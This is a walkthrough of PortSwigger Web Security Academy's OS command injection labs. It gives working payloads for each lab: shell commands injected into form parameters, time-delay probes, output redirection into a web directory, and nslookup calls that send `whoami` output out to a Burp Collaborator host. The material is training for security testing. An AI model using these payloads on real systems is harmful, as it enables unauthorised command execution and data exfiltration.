WebSecurityAcademy (PortSwigger) – OS command injection

Walk-through of the OS command injection lab on PortSwigger Web Security Academy.

• Apprentice – OS command injection, simple case
• Practitioner – Blind OS command injection with time delays
• Practitioner – Blind OS command injection with output redirection
• Practitioner – Blind OS command injection with out-of-band interaction
• Practitioner – Blind OS command injection with out-of-band data exfiltration

Apprentice – OS command injection, simple case

Check stock for a product

POST /product/stock HTTP/1.1
...

productId=1&storeId=1

Send the request to the Repeater module.

Do a command injection in the storeId parameter

Modify the request in the Repeater module with this payload:

productId=1&storeId=<@urlencode>1 && whoami<@/urlencode>

Other payload that work:

productId=1&storeId=<@urlencode>1 | whoami<@/urlencode>

Practitioner – Blind OS command injection with time delays

Click on the Submit feedback link. Enter any feedback and inspect the request.

POST /feedback/submit HTTP/1.1
H...

csrf=UkOO8nQrtWJkS2G2TcIYpJSotG6RYFnK&name=whatever&email=whatever%40example.com&subject=whatever&message=whatever

Send the request to the Repeater module.

Do a command injection in the email parameter

Modify the request in the Repeater module with this payload:

csrf=UkOO8nQrtWJkS2G2TcIYpJSotG6RYFnK&name=test&email=<@urlencode>; ping -c 10 127.0.0.1; <@/urlencode>&subject=test&message=whatever

csrf=UkOO8nQrtWJkS2G2TcIYpJSotG6RYFnK&name=test&email=<@urlencode>; sleep 10; <@/urlencode>&subject=test&message=whatever

Practitioner – Blind OS command injection with output redirection

Click on the Submit feedback link. Enter any feedback and inspect the request.

POST /feedback/submit HTTP/1.1
...

csrf=uBVylSsu0ow53swpS6xlvARvS3ssmZbu&name=whatever&email=whatever%40a.com&subject=whatever&message=whatever

Do a command injection in the email parameter

Modify the request in the Repeater module with this payload:

csrf=uBVylSsu0ow53swpS6xlvARvS3ssmZbu&name=whatever&email=<@urlencode>; whoami > /var/www/images/whoami.txt; <@/urlencode>&subject=whatever&message=whatever

Access the file created by the command injection

GET /image?filename=whoami.txt HTTP/1.1

Practitioner – Blind OS command injection with out-of-band interaction

Click on the Submit feedback link. Enter any feedback and inspect the request.

POST /feedback/submit HTTP/1.1
...

csrf=WLiemipQMCM32hAdtbUAIy7jLl6uYE15&name=whatever&email=whatever%40example.com&subject=whatever&message=whatever

Send the request to the Repeater module.

Do a command injection in the email parameter

Click on the Collaborator tab and click on Copy to clipboard to get the Collaborator URL. Modify the request in the Repeater module with this payload (replace the URL with your specific Collaborator URL):

csrf=WLiemipQMCM32hAdtbUAIy7jLl6uYE15&name=whatever&email=<@urlencode>; nslookup wtt9phrz2a46l0lc8a9v0q8yipogc70w.oastify.com; <@/urlencode>&subject=whatever&message=whatever

Practitioner – Blind OS command injection with out-of-band data exfiltration

Click on the Submit feedback link. Enter any feedback and inspect the request.

POST /feedback/submit HTTP/1.1
...

csrf=UCrWtm65NytEPwe3YCHjw3KscZsuJaeU&name=whatever&email=whatever%40example.com&subject=whatever&message=whatever

Send the request to the Repeater module.

Do a command injection in the email parameter

Click on the Collaborator tab and click on Copy to clipboard to get the Collaborator URL. Modify the request in the Repeater module with this payload (replace the URL with your specific Collaborator URL):

csrf=UCrWtm65NytEPwe3YCHjw3KscZsuJaeU&name=whatever&email=<@urlencode>; nslookup `whoami`.gl5th1jjuuwqdkdw0u1fsa0ia9g04ssh.oastify.com; <@/urlencode>&subject=whatever&message=whatever

Click on Poll now in the Collaborator tab.

The Collaborator server received a DNS lookup of type A for the domain name peter-h7HHUD.gl5th1jjuuwqdkdw0u1fsa0ia9g04ssh.oastify.com.

Submit peter-h7HHUD as the answer to solve the lab.